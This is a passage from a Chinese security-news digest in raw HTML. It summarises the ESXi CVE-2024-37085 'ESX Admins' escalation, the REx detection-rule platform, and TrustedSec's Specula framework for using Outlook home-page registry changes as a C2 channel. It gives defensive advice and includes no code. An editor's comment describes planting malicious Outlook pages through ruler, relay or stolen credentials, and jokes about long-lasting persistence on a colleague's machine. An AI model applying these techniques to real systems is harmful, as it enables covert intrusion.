		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNhNWbETblyjA3HTQUfZmTgIaXicw6WQ11kRhmiaTh8Fniav6aFy2wqzmmw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNhNWbETblyjA3HTQUfZmTgIaXicw6WQ11kRhmiaTh8Fniav6aFy2wqzmmw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122822822511214"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">ESXi虚拟机管理程序的CVE-2024-37085漏洞为勒索软件运营商提供了对域连接的ESXi虚拟机管理程序获取完全管理权限的途径。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过利用“ESX Admins”组来提升权限，即使该组在Active Directory中不存在。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">ESXi虚拟机管理程序因其在企业网络中的普及性，成为了勒索软件攻击的热门目标。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">微软强调了安全更新的重要性，并提供了多种安全措施和工具来帮助企业保护他们的ESXi虚拟机管理程序。</section></li></ul>
	<br/>
	<p>🏷️: 勒索软件, ESXi, 漏洞, 虚拟机管理程序, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 规则探索者项目REx介绍</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">REx项目是一个开源安全检测规则集合的探索和分析平台，旨在通过Elastic Stack的搜索和可视化功能，提供对检测生态系统的深入理解。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.22685185185185186" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=58e05fb0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnmMbSSOXzLLv374fC8mUZNtETMq7syicCzRStVibZj0QaLJCWDMzeF8nhDbGjo9UZGzobhujQ0tokQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5740740740740741" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=f62de105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnmMbSSOXzLLv374fC8mUZNNzpiaNE0QWYvIclCBgvoAl0ZnByBvWqnbgibyz6ickyiatBeEDA2ek6VeA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNuSWukZeLQQU8ic6mmptAib1MoyHVopHda0cRwnGwCqbgmPYxrEoyLuicg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNuSWukZeLQQU8ic6mmptAib1MoyHVopHda0cRwnGwCqbgmPYxrEoyLuicg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122822822514414"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">REx项目强调通过可视化和数据分析来提供对检测规则集合的深入理解，以及通过不同视角来观察规则开发、检测工程生态系统和威胁景观。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DETR作为一个交互式和动态的报告，提供了对规则集的最新快shots、变化趋势和独特性的深入分析，以及对已知威胁的应对分析。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">REx项目鼓励用户通过多种搜索和可视化方式来分析数据，以便从不同的角度和需求出发，获得更多的洞察力和视角。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">项目的目标不是进行供应商或覆盖范围的比较，而是提供一个用于分析规则和检测工程生态系统的平台，帮助用户创建高质量、高效能的规则。</section></li></ul>
	<br/>
	<p>🏷️: 规则探索, 安全检测, 数据分析, 可视化</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 利用注册表将Outlook变为C2代理</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">TrustedSec 发布了 Specula 框架，这是一个利用 Outlook 注册表更改将电子邮件客户端转变为持续的 C2 通信通道的工具，即使在许多坚固防守的网络中，这种攻击手段仍然未被察觉。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:outlook page这个洞还挺经典的，ruler也支持, 也可以relay或者账密添加恶意page, 并且不在常规安全更新补丁里，得手动打指定的补丁. ps: 之前用这个测试过茄子🤣，离职后，过了几年他重装电脑，发现又中招了，驻留很持久, 除非删除恶意page.</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNZ8hHhaTFC0RShRTpTRliah3G6IwKicJrKPrEv8W1icichQOUsLcbb58QXw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNZ8hHhaTFC0RShRTpTRliah3G6IwKicJrKPrEv8W1icichQOUsLcbb58QXw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844144144551888"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Outlook 的首页功能可以被恶意利用作为 C2 通信通道，即使在应该已经修复的环境中也能有效。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Specula 框架提供了一个强大、模块化的工具集，用于利用 Outlook 的注册表更改进行持续的 C2 通信。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">即使在安装了安全更新的环境中，Outlook 的注册表值可能仍然允许攻击者建立 C2 通道。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">为了防御此类攻击，建议采取多种措施，包括使用新版本的 Outlook、移除 vbscript 引擎、配置 GPO 以及应用安全基线。</section></li></ul>
	<br/>
	<p>🏷️: Outlook, C2, 网络安全, 注册表</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 Specula框架：在Outlook环境下利用VBScript进行恶意软件操作</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Specula 是一个利用 Outlook 环境下的 VBScript 功能，通过设置自定义首页来实现互动式恶意软件（implant）操作的框架。</span>
		</p>
